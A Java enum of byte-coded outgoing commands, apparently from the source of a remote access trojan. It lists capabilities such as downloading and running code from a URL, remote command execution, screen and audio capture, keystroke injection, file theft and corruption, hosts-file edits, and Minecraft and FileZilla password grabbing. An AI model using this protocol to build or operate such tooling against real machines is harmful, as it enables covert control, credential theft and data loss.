package com.redpois0n.packets;

public enum OutgoingHeader {

	DISCONNECT(/* "DISCONNECT" */(byte) 11),
	RESTART_JVM(/* "RESTARTC" */(byte) 37),
	RECONNECT(/* "RECONNECT" */(byte) 45),
	UNINSTALL(/* "UNINSTALL" */(byte) 36),
	DOWNLOAD_URL(/* "DLRUNURL" */(byte) 17),
	UPDATE(/* "UPDATE" */(byte) 18),
	RUN_COMMAND(/* "REXEC" */(byte) 38),
	VISIT_URL(/* "VISITURL" */(byte) 14),
	THUMBNAIL(/* "THUMBNAIL" */(byte) 40),
	TAKE_FILE(/* "TAKEFILE" */(byte) 42),
	GET_SCREEN(/* "GETSCREEN" */(byte) 12),
	GET_SCREEN_ONCE(/* "GETSCREENONCE" */(byte) 13),
	SCRIPT(/* "SCRIPT" */(byte) 35),
	REDIRECT(/* "SESRED" */(byte) 75),
	COMPUTER_SHUTDOWN(/* "SHUTDOWN" */(byte) 28),
	COMPUTER_RESTART(/* "RESTART" */(byte) 29),
	COMPUTER_SLEEP(/* "SLEEPMODE" */(byte) 31),
	COMPUTER_LOCK(/* "LOCK" */(byte) 32),
	COMPUTER_LOGOUT(/* "LOGOUT" */(byte) 30),
	REGISTRY_CUSTOM(/* "REGC" */(byte) 80),
	PASSWORD_MINECRAFT(/* "MC" */(byte) 50),
	PREVIEW_FILE(/* "RD" */(byte) 60),
	PREVIEW_IMAGE(/* "IMGP" */(byte) 62),
	PREVIEW_ARCHIVE(/* "ZIP" */(byte) 63),
	CHAT(/* "CHAT" */(byte) 51),
	CHAT_START(/* "STARTCHAT" */(byte) 48),
	CHAT_END(/* "ENDCHAT" */(byte) 49),
	CHAT_NUDGE(/* "NUDGE" */(byte) 58),
	LIST_PROCESSES(/* "LISTPROCESS" */(byte) 19),
	KILL_PROCESS(/* "KILLPROCESS" */(byte) 20),
	REGISTRY_BROWSE(/* "REG" */(byte) 79),
	MOUSE_MOVE(/* "M" */(byte) 91),
	MOUSE_PRESS(/* "P" */(byte) 92),
	MOUSE_RELEASE(/* "R" */(byte) 93),
	ENVIRONMENT_VARIABLES(/* "VAR" */(byte) 96),
	SYSTEM_PROPERTIES(/* "PROP" */(byte) 90),
	KEY_RELEASE(/* "KR" */(byte) 95),
	KEY_PRESS(/* "KP" */(byte) 94),
	CMD_RUN(/* "RUNCMD" */(byte) 23),
	CMD_END(/* "ENDCMD" */(byte) 24),
	CMD_EXECUTE(/* "EXEC" */(byte) 25),
	SOUND_CAPTURE(/* "SO" */(byte) 84),
	LIST_THUMBNAIL(/* "LISTI" */(byte) 85),
	LIST_FILES(/* "LISTFILES" */(byte) 15),
	GET_FILE(/* "GETFILE" */(byte) 21),
	CORRUPT_FILE(/* "CORRUPT" */(byte) 70),
	MD5_FILE(/* "MD5" */(byte) 64),
	RENAME_FILE(/* "RNTO" */(byte) 47),
	DELETE_FILE(/* "DELETEFILE" */(byte) 16),
	FILE_CREATE_DIRECTORY(/* "MKDIR" */(byte) 43),
	BROWSE_SPECIAL(/* "DIR" */(byte) 41),
	GET_ACTIVE_PORTS(/* "GETPORTS" */(byte) 73),
	LIST_NETWORK_ADAPTERS(/* "LISTAD" */(byte) 82),
	GET_CLIPBOARD(/* "CBOARD" */(byte) 59),
	REFRESH_COMPUTER_INFO(/* "REFRESHINFO" */(byte) 27),
	SYSTEM_INFORMATION_EXE(/* "SYSINFO" */(byte) 83),
	GET_STUB_CONFIG(/* "GETSCONFIG" */(byte) 88),
	CUSTOM_DOWNLOAD(/* "CUSTOMDL" */(byte) 34),
	GET_ERROR_LOG(/* "GETERRLOG" */(byte) 86),
	DELETE_ERROR_LOG(/* "DELERRLOG" */(byte) 87),
	PASSWORD_FILEZILLA(/* "FZ" */(byte) 68),
	PLAY_SOUND_FROM_URL(/* "URLSOUND" */(byte) 44),
	VISIT_URL_MUCH(/* "VISITURLMUCH" */(byte) 39),
	BEEP(/* "BEEP" */(byte) 65),
	CRAZY_MOUSE(/* "CMOUSE" */(byte) 46),
	UPDATE_HOSTS(/* "UHOST" */(byte) 56),
	GET_HOSTS_FILE(/* "GETHOSTFI" */(byte) 55),
	LIST_INSTALLED_PROGRAMS(/* "LISTINSTALL" */(byte) 81),
	GET_JVM_PROPERTIES(/* "JVM" */(byte) 61),
	LIST_LAN(/* "LISTLAN" */(byte) 71),
	LOCALES(/* "LOCALES" */(byte) 97),
	MESSAGEBOX(/* "MSGBOX" */(byte) 10),
	IPCONFIG(/* "IPCONFIG" */(byte) 72),
	SEND_PIANO(/* "CPIA" */(byte) 67),
	PIANO(/* "PIA" */(byte) 66),
	LOAD_PLUGINS(/* "LOADPLUGINS" */(byte) 89),
	PRINT(/* "PRINTER" */(byte) 69),
	LIST_REG_STARTUP(/* "LISTSTARTUP" */(byte) 78),
	END_SEARCHING(/* "EFIND" */(byte) 54),
	START_SEARCH(/* "FIND" */(byte) 53),
	LIST_SERVICES(/* "LISTSER" */(byte) 77),
	SPEECH(/* "SPEECH" */(byte) 76),
	GARBAGE_COLLECT(/* "GC" */(byte) 74),
	GET_TORRENTS(/* "GETUT" */(byte) 57),
	PING(/*"PING"*/ (byte) 0),
	GET_RAM(/* "GETRAM" */(byte) 33),
	QUICK_DESKTOP(/* "QUICKDESKTOP" */(byte) 98),
	ENCRYPTION(/* "ENC" */(byte) 99);

	private final byte header;

	private OutgoingHeader(byte header) {
		this.header = header;
	}

	public byte getHeader() {
		return header;
	}

}